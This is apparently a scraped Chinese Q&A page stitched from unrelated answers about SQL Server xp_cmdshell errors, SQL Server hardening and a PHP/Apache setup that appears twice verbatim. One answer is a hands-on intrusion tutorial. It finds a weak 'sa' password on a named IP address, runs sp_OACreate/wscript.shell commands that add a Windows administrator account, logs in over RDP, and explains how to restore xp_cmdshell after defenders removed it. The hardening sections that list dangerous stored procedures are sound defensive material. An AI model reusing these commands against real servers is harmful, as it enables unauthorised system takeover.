1. 在執行 xp_cmdshell 的過程中出錯。調用 'CreateProcess' 失敗,錯誤代碼: '5'。
在執行 xp_cmdshell 的過程中出錯。調用 'CreateProcess' 失敗,錯誤代碼: '5'是設置錯誤造成的,解決方法為:
1、將其它盤msdia80.dll文件復制到C盤指定文件中。
2. xpsql70.dll存放在哪
我也不知道,不過我給你說你可以找一台有這個補丁的機器然後用系統自帶的搜索找到這個文件就有了具體位置 這是個不是辦法的辦法
3. 拒絕了對對象 'xp_cmdshell'(資料庫 'master',所有者 'dbo')的 EXECUTE 許可權的問題急
當sa儲存擴展被刪除後....sa弱口令相關命令
可不知道大家有無這樣的經歷?當用sql綜合利用工具連接成功後,有的能直接執行命令,創建帳戶,
有的執行命令時卻遇上下面種種情況而使你辛苦掃得的sa 弱口令失效,功虧一簣~
例如執行命令後回顯1:未能找到存儲過程'master..xpcmdshell'.
回顯2:無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。原因126(找不到指定模塊。)
回顯3:拒絕了對對象 'xp_cmdshell'(資料庫 'master',所有者 'dbo')的 EXECUTE 許可權。
等等可能還有些吧。這幾個比較常見。
碰上這種情況,小菜們就變得無所適從了,棰胸跺足,甚至侮辱斯文,臭罵管理員。。。
呵呵,俺認為,回顯1,2一般要麼是管理員lj,要麼是中級菜友的傑作,一般都是可以恢復的shell。回顯3可就是經典作品了,把sa的許可權降低了,與systemadmin脫離了聯系。。。對於這種情況,俺還沒有更好的解決辦法。(哪位大哥知道麻煩告訴我一聲^_^)
下面我就具體演示一下我是怎麼對付這樣的情況的。
用到的工具:sql查詢分離器休閑庄專用版。
怕大家找不到,我把下載地址給大家
SQL查詢分析器休閑庄分離版本
http://soft.7747.net/ware/774710/sqlquery.zip
假如我們掃到了:
[219.84.135.161]: 發現SQL-Server弱口令 "sa/[口令與用戶名相同]"
[219.84.135.161]: "SQL-Server弱口令"掃描完成, 發現 1.
還開了3389!
先打開sql綜合利用工具
連接試試
看,連接成功。
執行命令時,回顯
無法載入 DLL C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplo.dll,或是參考到某個 DLL 。原因: 126(找不到指定的模組。)。
這個時候,我們就沒辦法再繼續下去了。
下面打開sql查詢分離器
登陸進去
出來一個白白的這個。。。
呵呵
哦。
這個ip是開了3389的。
我們先登陸3389看是否成功。
忘記講了
看。windows2000的server版
好了。我們再在sql查詢分離器中輸入命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user test 123 /add'
這個命令就是創建一個用戶名為test,密碼為123的用戶,
輸入後按F5
我們看到回顯有個這個表格樣的東東,0。這樣的。
這就表示成功了。如果回顯「命令成功完成」,反而是沒有成功~
呵呵不要上當哦。
下面提升test的許可權
輸入命令
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators test /add'
把test提升為管理員
按F5執行命令,回顯和剛才一樣。。。
下面我們登陸3389
用帳戶test
密碼123
看能不能登陸,看。。。。
進去了吧。。。
呵呵。。。
**********************************************************************************
sa弱口令相關命令
總結的一些關於sa弱口令相關命令.
注:具體問題具體分析,以上方法僅供參考,不一定有效,相關原理知識請自行查找。重要提示!以上提供的方法僅供學習研究!請大家不要進行任何破壞國內主機的違法行為!否則一切後果自負!轉載請保留此信息。
一.更改sa口令方法:
用sql綜合利用工具連接後,執行命令:
exec sp_password NULL,'新密碼','sa'
(提示:慎用!)
二.簡單修補sa弱口令.
方法1:查詢分離器連接後執行:
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
然後按F5鍵命令執行完畢
方法2:查詢分離器連接後
第一步執行:use master
第二步執行:sp_dropextendedproc 'xp_cmdshell'
然後按F5鍵命令執行完畢
三.常見情況恢復執行xp_cmdshell.
1 未能找到存儲過程'master..xpcmdshell'.
恢復方法:查詢分離器連接後,
第一步執行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按F5鍵命令執行完畢
2 無法裝載 DLL xpsql70.dll 或該DLL所引用的某一 DLL。原因126(找不到指定模塊。)
恢復方法:查詢分離器連接後,
第一步執行:sp_dropextendedproc "xp_cmdshell"
第二步執行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然後按F5鍵命令執行完畢
3 無法在庫 xpweb70.dll 中找到函數 xp_cmdshell。原因: 127(找不到指定的程序。)
恢復方法:查詢分離器連接後,
第一步執行:exec sp_dropextendedproc 'xp_cmdshell'
第二步執行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
然後按F5鍵命令執行完畢
四.終極方法.
如果以上方法均不可恢復,請嘗試用下面的辦法直接添加帳戶:
查詢分離器連接後,
2000servser系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用戶 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用戶 /add'
xp或2003server系統:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用戶 密碼 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用戶 /add'
4. 如何架設PHP伺服器
【一】首先下載軟體:
(apache) 我用的是在華軍軟體園下載的apache_1.3.26-win32-x86-no_src!!
(jdk!) 在首頁上面就有連接。
(php4) 不用多說了code-labs上面就有也可以去php的官方網站看看!!
(iasp) 最重要的一個軟體了——————————————————————————————————
【二】安裝apache
1、雙擊apache的安裝文件,和普通windows程序安裝一樣,一路點「next」就可以。
2、安裝程序要求你輸入你的network domain(網路域名:形如xxx.com);server domain(伺服器域名:形www.xxx.com)和網站管理員的e-mail。有的話就按實填寫,個人用戶若沒有的話可以按格式隨便填一下。
3、到了選擇安裝路徑,本人強烈建議你將安裝路徑改為「c:\」,因為這樣可以省去好多的配置麻煩。 4、一路「next」直至「finish」。安裝就結束了。
這時,你的apache已經啟動了,你可以在ie地址欄里輸入:http://localhost/或http://127.0.0.1看看。在「管理工具」的「服務」項中,也可以找到apache服務的身影了,以後apache就可以作為一項windows2000服務,隨著機器的啟動而運行了!
------------------------------------------------------------------------------
【三】配置apache
打開配置文件主要修改的項目是:
(1)、查找documentroot。這個語句指定你的網站路徑,也就是你主頁放置的目錄。你可以使用默認的,也可以自己指定一個,但記住,這句末尾不要加「/」。
(2)、尋找到directoryindex。這就是你站點第一個顯示的主頁,在index.html的後面加入index.htm index.php index.php3 index.cgi index.pl index.asp等等。注意,每種類型之間都要留一空格!
(3)、特別說明一點就是port(埠號),如果沒安裝iis的話,就保持80不要變,否則,就要改一下(因為iis的web服務占據了80),可以改成81等等,或者乾脆改iis的默認埠號!隨你高興。
(4).#bindaddress * 改為 bindaddress 127.0.0.1(用記事本打開/然後點編輯/查找)
其他都是以後深入使用是才要配置的項目了!安裝完畢後運行http://localhost/
就可以看見apache的幫助文件了!
-----------------------------------------------------------------------------
【四】安裝xxx(注意這個最主要的了)(關閉apache服務)
(1)、下面安裝php首先安裝php到c:\php4 (別改路徑了!否則以後的配置....哼哼)我用的是php的4.0.2版,
(2)、接下來就要拷貝msvcrt.dll到c:\winnt\system32\下面系統就回提示所文件正在被windows使用了,不要緊正常現象!覆蓋任何原有文件。
(3)、把 c:\php.ini-dist改名為php.ini,拷貝到c:\winnt下,
(4)、好了現在打開apache的配置文件httpd.conf增加下面的語句:(隨便什麼地方都可以,但要單獨成行)
scriptalias /php4/ "c:/php4/"
addtype application/x-httpd-php4 .php
addtype application/x-httpd-php4 .php3
addtype application/x-httpd-php4 .php4
action application/x-httpd-php4 "/php4/php.exe"
directoryindex index.html
directoryindex index.htm
directoryindex index.php
directoryindex index.php3
directoryindex index.php4
directoryindex index.asp
(5)、接下來修改php.ini文件
找到windows extensions項:增加
extension_dir = c:\php4
extension=php_zlib.dll
extension =php_ldap.dll
extension =php_zlib.dll
extension =php_calendar.dll
extension =php_exif.dll
extension =php_ftp.dll
extension =php_mssql70.dll (這一項不要加,沒有mssql7.0呀)
extension =php_imap.dll
■ok存檔ko■
在你的documentroot的目錄下建立test.php文件
<?phpinfo();?>
ok看見php的測試頁面了!!至此php的配置已經完成了!
下面安裝jdk也是進行默認安裝就可以了!之後在windows的環境變數裡面增加path變數值c:\j2sdk*\bin(*:不同版本的安裝路徑名不同)
好了下面安裝iasp使用默認安裝就可以了!在安裝過程後軟體會提示你進行web server的設置首先選擇:
instant asp native servlet surport 選項接下來選擇apache server
之後要求你選擇apche的版本號和httpd.conf的路徑選擇好後系統自動進行配置如果一切順利就可以測試了!!
建立test.asp
<%response.write("hell world!")%>
現在運行http://localhost/test.asp,看到helloworld!好了一切搞定有可以使用apache了!!!
------------------------------------------------------------------------
【五】、上面說到了windows+apache+php+asp的運行環境了今天來說說在這個基礎上使apache也可以支持jsp的運行。
1:所需軟體resin(resin2.1.4)resin http://www.caochu.com
下面說說怎麼安裝:
resin在下載後是.zip文件只要簡單的解壓縮到指定的目錄就可以了這里我使用的是c:\resin-ee-2.1.4 利用命令 c:\resin-ee-2.1.4\bin\httpd.exe -install(remove)將resin作為win2000的一個service
ok!下面找到win2000的環境變數"控制面板-->系統-->高級-->環境變數「
增加變數"resin_home"變數值"c:\resin-ee-2.1.4"如果你已經安裝了 jdk那麼就不需要設置什麼了!沒有的話就看看的我的上一篇文章!!!ok向下~~
現在修改apache的設置文件httpd.conf假如下面的代碼:
loadmole caucho_mole c:/resin-ee-2.1.4/libexec/apache-1.3/mod_caucho.dll
addmole mod_caucho.c
5. 啟用 xp cmdshell
xp_cmdshell可以讓系統管理員以操作系統命令行解釋器的方式執行給定的命令字元串,並以文本行方式返回任何輸出,是一個功能非常強大的擴展存貯過程。一般情況下,xp_cmdshell對管理員來說也是不必要的,xp_cmdshell的消除不會對Server造成任何影響。
【解決辦法】:
1、通過SQL語句開啟。[推薦此方法,因為在任何版本的SQL SERVER中都可以使用。]
通過查詢分析器,選擇Master資料庫,然後執行以下SQL內容:
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go
執行結果:
配置選項 'show advanced options' 已從 0 更改為 1。請運行 RECONFIGURE 語句進行安裝。
配置選項 'xp_cmdshell' 已從 0 更改為 1。請運行 RECONFIGURE 語句進行安裝。
如需關閉只需將「sp_configure 'xp_cmdshell',1」改為「sp_configure 'xp_cmdshell',0」即可。
2、通過"SQL SERVER外圍應用配置器"開啟。[如果記代碼困難,那就用此方法吧。]
找到開始 --> SQL安裝目錄 --> 配置 SQL server managerment 外圍應用配置器。如圖:
打開後,找到「xp_cmdshell」點擊啟用。
6. SQL 資料庫網站應該怎麼做伺服器環境
其實,如果你只是為了簡單的使用SQL SEVER資料庫,只需按照你已經有的SQL動易網站幫助文檔,按其說明步驟,一步步創建資料庫,數據表等等,就已經達到」可用」這個基本目的了.
但是,如果你是要配置一個安全性高的sql資料庫伺服器,則要注意很多很多問題,並不是一件很簡單的事情.下面具體說明如何安全配置sql server伺服器,主要針對sql server 2000.
1.1. 第一步
打上SQLSERVER最新的安全補丁,現在補丁已經出到了SP3。下載地址網上搜一下。如果這一步都沒有做好,那我們也沒有繼續下去的必要了。
1.2. 第二步
修改默認的1433埠,並且將SQL SERVER隱藏。這樣能禁止對試圖枚舉網路上現有的SQL Server客戶端所發出的廣播做出響應。另外,還需要在TCP/IP篩選中將1433埠屏蔽掉,盡可能的隱藏你的SQL SERVER資料庫。這樣既便讓攻擊創建了SQL SERVER的賬號,也不能馬上使用查詢分析器遠程登陸來進行下一步的攻擊。單從ASP,PHP等頁面構造惡意語句的話,還有需要查看返回值的問題,總比不上直接查詢分析器來得利落。所以我們首先要做到即使讓別人注入了,也不能讓攻擊者下一步做得順當。修改方法:
企業管理器--> 你的資料庫組 --> 屬性 --> 常規 --> 網路配置 --> TCP/IP --> 屬性,在這兒將你的默認埠進行修改,和SQL SERVER的隱藏。
1.3.第三步
SQL INJECTION(sql注入)往往在Web CODE中產生,而作為系統管理員或者資料庫管理員,總不能常常的去看每一段代碼。即使常常看代碼,也不能保證我們在上面的疏忽。那怎麼辦?我們就要從資料庫角色著手,讓資料庫用戶的許可權劃分到最低點。SQL SERVER的默認許可權讓人真的很頭疼,許可權大得非常的高,許可權小的又什麼都做不了,SYSADMIN和DB_OWNER 真是讓人又愛又恨。攻擊者一但確認了網站存在SQL INJECTION漏洞,肯定有一步操作步驟就是測試網站的SQL SERVER使用者具有多大的許可權。一般都會藉助
SELECT IS_SRVROLEMEMBER('sysadmin')
或者
SELECT IS_MEMBER('db_owner')
再或者
user =0
(讓字元和數字進行比較,SQL SERVER就會提示了錯誤信息,從該信息中即可知道一些敏感信息)等語句進行測試。當然還有其他的方法。在當前,如果網站的資料庫使用者用的是SA許可權,再加上確認了WEB所處在的絕對路徑,那麼就宣告了你的網站的OVER。DB_OWNER許可權也一樣,如果確認了絕對路徑,那麼有50%的機會能給你的機器中上WEB方式的木馬,如海陽等。所以這兒我們確認了一點,我們必須要創建自已的許可權,讓攻擊者找不著下手的地方。在這兒引用一個SQL SERVER聯機幫助中的例子:
創建 SQL Server 資料庫角色的方法(企業管理器)
創建 SQL Server 資料庫角色
1. 展開伺服器組,然後展開伺服器。
2. 展開"資料庫"文件夾,然後展開要在其中創建角色的資料庫。
3. 右擊"角色",然後單擊"新建資料庫角色"命令。
4. 在"名稱"框中輸入新角色的名稱。
5. 單擊"添加"將成員添加到"標准角色"列表中,然後單擊要添加的一個或多個用戶。(可選)
只有選定資料庫中的用戶才能被添加到角色中。
對象許可權
處理數據或執行過程時需要稱為對象許可權的許可權類別:
• SELECT、INSERT、UPDATE 和 DELETE 語句許可權,它們可以應用到整個表或視圖中。
• SELECT 和 UPDATE 語句許可權,它們可以有選擇性地應用到表或視圖中的單個列上。
• SELECT 許可權,它們可以應用到用戶定義函數。
• INSERT 和 DELETE語句許可權,它們會影響整行,因此只可以應用到表或視圖中,而不能應用到單個列上。
• EXECUTE 語句許可權,它們可以影響存儲過程和函數。
語句許可權
創建資料庫或資料庫中的項(如表或存儲過程)所涉及的活動要求另一類稱為語句許可權的許可權。例如,如果用戶必須能夠在資料庫中創建表,則應該向該用戶授予
CREATE TABLE 語句許可權。語句許可權(如 CREATE DATABASE)適用於語句自身,而不適用於資料庫中定義的特定對象。
語句許可權有:
• BACKUP DATABASE
• BACKUP LOG
• CREATE DATABASE
• CREATE DEFAULT
• CREATE FUNCTION
• CREATE PROCEDURE
• CREATE RULE
• CREATE TABLE
• CREATE VIEW
暗示性許可權
暗示性許可權控制那些只能由預定義系統角色的成員或資料庫對象所有者執行的活動。例如,sysadmin。
固定伺服器角色成員自動繼承在 SQL Server 安裝中進行操作或查看的全部許可權。
資料庫對象所有者還有暗示性許可權,可以對所擁有的對象執行一切活動。例如,擁有表的用戶可以查看、添加或刪除數據,更改表定義,或控制允許其他用戶對表進行操作的許可權。
db_owner 在資料庫中有全部許可權。
db_Accessadmin 可以添加或刪除用戶 ID。
db_securityadmin 可以管理全部許可權、對象所有權、角色和角色成員資格。
db_ddladmin 可以發出 ALL DDL,但不能發出 GRANT、REVOKE 或DENY 語句。
db_backupoperator 可以發出 DBCC、CHECKPOINT 和 BACKUP 語句。
db_datareader 可以選擇資料庫內任何用戶表中的所有數據。
db_datawriter 可以更改資料庫內任何用戶表中的所有數據。
db_denydatareader 不能選擇資料庫內任何用戶表中的任何數據。
db_denydatawriter 不能更改資料庫內任何用戶表中的任何數據。
在這兒把新建的資料庫角色的許可權配置好,比如需要使用哪個表、視圖、存儲過程等。然後把db_owner和db_securityadmin、db_backupoperator取消,不給攻擊者BACKUP DATABASE和CREATE TABLE的機會,一但攻擊者具有這兩個許可權,那麼你的網站就還處在十分危險的狀態。還有注意一下,在創建資料庫賬號時,千萬不能對伺服器角色進行選擇。
1.4.第四步
修改SQL SERVER內置存儲過程。
SQLSERVER估計是為了安裝或者其它方面,它內置了一批危險的存儲過程。能讀到注冊表信息,能寫入注冊表信息,能讀磁碟共享信息等等……各位看到這兒,心裡可能會在想,我的網站中有其它的代碼,又不像查詢分析器那樣能直接將結果輸出。給你這個許可權,也不能怎麼樣,還是看不到信息。如果各位這樣想就大錯特錯了。提示一下,如果攻擊者有CREATE TABLE的許可權,那麼創建一個臨時表,然後將信息INSERT到表中,然SELECT出來,接著跟數字進行比較,讓SQL SERVER報錯,那麼結果就全出來了……所以我們要報著寧錯殺,不放過的態度進行修補。
先來列出危險的內置存儲過程:
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
ActiveX自動腳本:
sp_OACreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop
以上各項全在我們封殺之列,例如xp_cmdshell屏蔽的方法為:sp_dropextendedproc 'xp_cmdshell' 。如果需要的話,再用sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 進行恢復。如果你不知道xp_cmdshell使用的是哪個.dll文件的話,可以使用sp_helpextendedproc xp_cmdshel來查看xp_cmdshell使用的是哪個動態聯接庫。另外,將xp_cmdshell屏蔽後,我們還需要做的步驟是將xpsql70.dll文件進行改名,以防止獲得SA的攻擊者將它進行恢復。
1.5. 結語
我們做到這兒,你的SQL SERVER就基本上安全了。但是安全終究是相對的,不可能百分之百,除非你的網站用的是HTML。
7. 如何架設本地PHP運行環境
【一】首先下載軟體:
(apache) 我用的是在華軍軟體園下載的apache_1.3.26-win32-x86-no_src!!
(jdk!) 在首頁上面就有連接。
(php4) 不用多說了code-labs上面就有也可以去php的官方網站看看!!
(iasp) 最重要的一個軟體了——————————————————————————————————
【二】安裝apache
1、雙擊apache的安裝文件,和普通windows程序安裝一樣,一路點「next」就可以。
2、安裝程序要求你輸入你的network domain(網路域名:形如xxx.com);server domain(伺服器域名:形www.xxx.com)和網站管理員的e-mail。有的話就按實填寫,個人用戶若沒有的話可以按格式隨便填一下。
3、到了選擇安裝路徑,本人強烈建議你將安裝路徑改為「c:\」,因為這樣可以省去好多的配置麻煩。 4、一路「next」直至「finish」。安裝就結束了。
這時,你的apache已經啟動了,你可以在ie地址欄里輸入:http://localhost/或http://127.0.0.1看看。在「管理工具」的「服務」項中,也可以找到apache服務的身影了,以後apache就可以作為一項windows2000服務,隨著機器的啟動而運行了!
------------------------------------------------------------------------------
【三】配置apache
打開配置文件主要修改的項目是:
(1)、查找documentroot。這個語句指定你的網站路徑,也就是你主頁放置的目錄。你可以使用默認的,也可以自己指定一個,但記住,這句末尾不要加「/」。
(2)、尋找到directoryindex。這就是你站點第一個顯示的主頁,在index.html的後面加入index.htm index.php index.php3 index.cgi index.pl index.asp等等。注意,每種類型之間都要留一空格!
(3)、特別說明一點就是port(埠號),如果沒安裝iis的話,就保持80不要變,否則,就要改一下(因為iis的web服務占據了80),可以改成81等等,或者乾脆改iis的默認埠號!隨你高興。
(4).#bindaddress * 改為 bindaddress 127.0.0.1(用記事本打開/然後點編輯/查找)
其他都是以後深入使用是才要配置的項目了!安裝完畢後運行http://localhost/
就可以看見apache的幫助文件了!
-----------------------------------------------------------------------------
【四】安裝xxx(注意這個最主要的了)(關閉apache服務)
(1)、下面安裝php首先安裝php到c:\php4 (別改路徑了!否則以後的配置....哼哼)我用的是php的4.0.2版,
(2)、接下來就要拷貝msvcrt.dll到c:\winnt\system32\下面系統就回提示所文件正在被windows使用了,不要緊正常現象!覆蓋任何原有文件。
(3)、把 c:\php.ini-dist改名為php.ini,拷貝到c:\winnt下,
(4)、好了現在打開apache的配置文件httpd.conf增加下面的語句:(隨便什麼地方都可以,但要單獨成行)
scriptalias /php4/ "c:/php4/"
addtype application/x-httpd-php4 .php
addtype application/x-httpd-php4 .php3
addtype application/x-httpd-php4 .php4
action application/x-httpd-php4 "/php4/php.exe"
directoryindex index.html
directoryindex index.htm
directoryindex index.php
directoryindex index.php3
directoryindex index.php4
directoryindex index.asp
(5)、接下來修改php.ini文件
找到windows extensions項:增加
extension_dir = c:\php4
extension=php_zlib.dll
extension =php_ldap.dll
extension =php_zlib.dll
extension =php_calendar.dll
extension =php_exif.dll
extension =php_ftp.dll
extension =php_mssql70.dll (這一項不要加,沒有mssql7.0呀)
extension =php_imap.dll
■ok存檔ko■
在你的documentroot的目錄下建立test.php文件
<?phpinfo();?>
ok看見php的測試頁面了!!至此php的配置已經完成了!
下面安裝jdk也是進行默認安裝就可以了!之後在windows的環境變數裡面增加path變數值c:\j2sdk*\bin(*:不同版本的安裝路徑名不同)
好了下面安裝iasp使用默認安裝就可以了!在安裝過程後軟體會提示你進行web server的設置首先選擇:
instant asp native servlet surport 選項接下來選擇apache server
之後要求你選擇apche的版本號和httpd.conf的路徑選擇好後系統自動進行配置如果一切順利就可以測試了!!
建立test.asp
<%response.write("hell world!")%>
現在運行http://localhost/test.asp,看到helloworld!好了一切搞定有可以使用apache了!!!
------------------------------------------------------------------------
【五】、上面說到了windows+apache+php+asp的運行環境了今天來說說在這個基礎上使apache也可以支持jsp的運行。
1:所需軟體resin(resin2.1.4)resin http://www.caochu.com
下面說說怎麼安裝:
resin在下載後是.zip文件只要簡單的解壓縮到指定的目錄就可以了這里我使用的是c:\resin-ee-2.1.4 利用命令 c:\resin-ee-2.1.4\bin\httpd.exe -install(remove)將resin作為win2000的一個service
ok!下面找到win2000的環境變數"控制面板-->系統-->高級-->環境變數「
增加變數"resin_home"變數值"c:\resin-ee-2.1.4"如果你已經安裝了 jdk那麼就不需要設置什麼了!沒有的話就看看的我的上一篇文章!!!ok向下~~
現在修改apache的設置文件httpd.conf假如下面的代碼:
loadmole caucho_mole c:/resin-ee-2.1.4/libexec/apache-1.3/mod_caucho.dll
addmole mod_caucho.c
8. 如何提高SQL Server的安全性控制
SQLServer2000的安全配置在進行SQLServer2000資料庫的安全配置之前,首先你必須對操作系統進行安全配置,保證你的操作系統處於安全狀態。然後對你要使用的操作資料庫軟體(程序)進行必要的安全審核,比如對ASP、PHP等腳本,這是很多基於資料庫的WEB應用常出現的安全隱患,對於腳本主要是一個過濾問題,需要過濾一些類似,『;@/等字元,防止破壞者構造惡意的SQL語句。接著,安裝SQLServer2000後請打上補丁sp1,sp2以及最新的sp3,sp4。在做完上面三步基礎之後,我們再來討論SQLServer的安全配置。1、使用安全的密碼策略我們把密碼策略擺在所有安全配置的第一步,請注意,很多資料庫帳號的密碼過於簡單,這跟系統密碼過於簡單是一個道理。對於sa更應該注意,同時不要讓sa帳號的密碼寫於應用程序或者腳本中。健壯的密碼是安全的第一步!SQLServer2000安裝的時候,如果是使用混合模式,那麼就需要輸入sa的密碼,除非你確認必須使用空密碼。這比以前的版本有所改進。同時養成定期修改密碼的好習慣。資料庫管理員應該定期查看是否有不符合密碼要求的帳號。比如使用下面的SQL語句:UsemasterSelectname,、使用安全的帳號策略由於SQLServer不能更改sa用戶名稱,也不能刪除這個超級用戶,所以,我們必須對這個帳號進行最強的保護,當然,包括使用一個非常強壯的密碼,最好不要在資料庫應用中使用sa帳號,只有當沒有其它方法登錄到SQLServer實例(例如,當其它系統管理員不可用或忘記了密碼)時才使用sa。建議資料庫管理員新建立個擁有與sa一樣許可權的超級用戶來管理資料庫。安全的帳號策略還包括不要讓管理員許可權的帳號泛濫。SQLServer的認證模式有Windows身份認證和混合身份認證兩種。如果資料庫管理員不希望操作系統管理員來通過操作系統登陸來接觸資料庫的話,可以在帳號管理中把系統帳號「BUILTIN\Administrators」刪除。不過這樣做的結果是一旦sa帳號忘記密碼的話,就沒有法來恢復了。很多主機使用資料庫應用只是用來做查詢、修改等簡單功能的,請根據實際需要分配帳號,並賦予僅僅能夠滿足應用要求和需要的許可權。比如,只要查詢功能的,那麼就使用一個簡單的public帳號能夠select就可以了。3、加強資料庫日誌的記錄審核資料庫登錄事件的「失敗和成功」,在實例屬性中選擇「安全性」,將其中的審核級別選定為全部,這樣在資料庫系統和操作系統日誌裡面,就詳細記錄了所有帳號的登錄事件。請定期查看SQLServer日誌檢查是否有可疑的登錄事件發生,或者使用DOS命令。findstr/C:"登錄"d:\MicrosoftSQLServer\MSSQL\LOG\*.*4、管理擴展存儲過程對存儲過程進行大手術,並且對帳號調用擴展存儲過程的許可權要慎重。其實在多數應用中根本用不到多少系統的存儲過程,而SQLServer的這么多系統存儲過程只是用來適應廣大用戶需求的,所以請刪除不必要的存儲過程,因為有些系統的存儲過程能很容易地被人利用起來提升許可權或進行破壞。如果你不需要擴展存儲過程xp_cmdshell請把它去掉。使用這個SQL語句:usemastersp_dropextendedproc'xp_cmdshell'xp_cmdshell是進入操作系統的最佳捷徑,是資料庫留給操作系統的一個大後門。如果你需要這個存儲過程,請用這個語句也可以恢復過來。sp_addextendedproc'xp_cmdshell','xpsql70.dll'如果你不需要請丟棄OLE自動存儲過程(會造成管理器中的某些特徵不能使用),這些過程包括如下:Sp_OACreateSp_OADestroySp_OAGetErrorInfoSp_OAGetPropertySp_OAMethodSp_OASetPropertySp_OAStop去掉不需要的注冊表訪問的存儲過程,注冊表存儲過程甚至能夠讀出操作系統管理員的密碼來,如下:Xp_regaddmultistringXp_regdeletekeyXp_regdeletevalueXp_regenumvaluesXp_regreadXp_regremovemultistringXp_regwrite還有一些其他的擴展存儲過程,你也最好檢查檢查。在處理存儲過程的時候,請確認一下,避免造成對資料庫或應用程序的傷害。5、使用協議加密SQLServer2000使用的TabularDataStream協議來進行網路數據交換,如果不加密的話,所有的網路傳輸都是明文的,包括密碼、資料庫內容等等,這是一個很大的安全威脅。能被人在網路中截獲到他們需要的東西,包括資料庫帳號和密碼。所以,在條件容許情況下,最好使用SSL來加密協議,當然,你需要一個證書來支持。6、不要讓人隨便探測到你的TCP/IP埠默認情況下,SQLServer使用1433埠監聽,很多人都說SQLServer配置的時候要把這個埠改變,這樣別人就不能很容易地知道使用的什麼埠了。可惜,通過微軟未公開的1434埠的UDP探測可以很容易知道SQLServer使用的什麼TCP/IP埠了。不過微軟還是考慮到了這個問題,畢竟公開而且開放的埠會引起不必要的麻煩。在實例屬性中選擇TCP/IP協議的屬性。選擇隱藏SQLServer實例。如果隱藏了SQLServer實例,則將禁止對試圖枚舉網路上現有的SQLServer實例的客戶端所發出的廣播作出響應。這樣,別人就不能用1434來探測你的TCP/IP埠了(除非用PortScan)。7、修改TCP/IP使用的埠請在上一步配置的基礎上,更改原默認的1433埠。在實例屬性中選擇網路配置中的TCP/IP協議的屬性,將TCP/IP使用的默認埠變為其他埠.9、拒絕來自1434埠的探測由於1434埠探測沒有限制,能夠被別人探測到一些資料庫信息,而且還可能遭到DOS攻擊讓資料庫伺服器的CPU負荷增大,所以對Windows2000操作系統來說,在IPSec過濾拒絕掉1434埠的UDP通訊,可以盡可能地隱藏你的SQLServer。10、對網路連接進行IP限制SQLServer2000資料庫系統本身沒有提供網路連接的安全解決法,但是Windows2000提供了這樣的安全機制。使用操作系統自己的IPSec可以實現IP數據包的安全性。請對IP連接進行限制,只保證自己的IP能夠訪問,也拒絕其他IP進行的埠連接,把來自網路上的安全威脅進行有效的控制。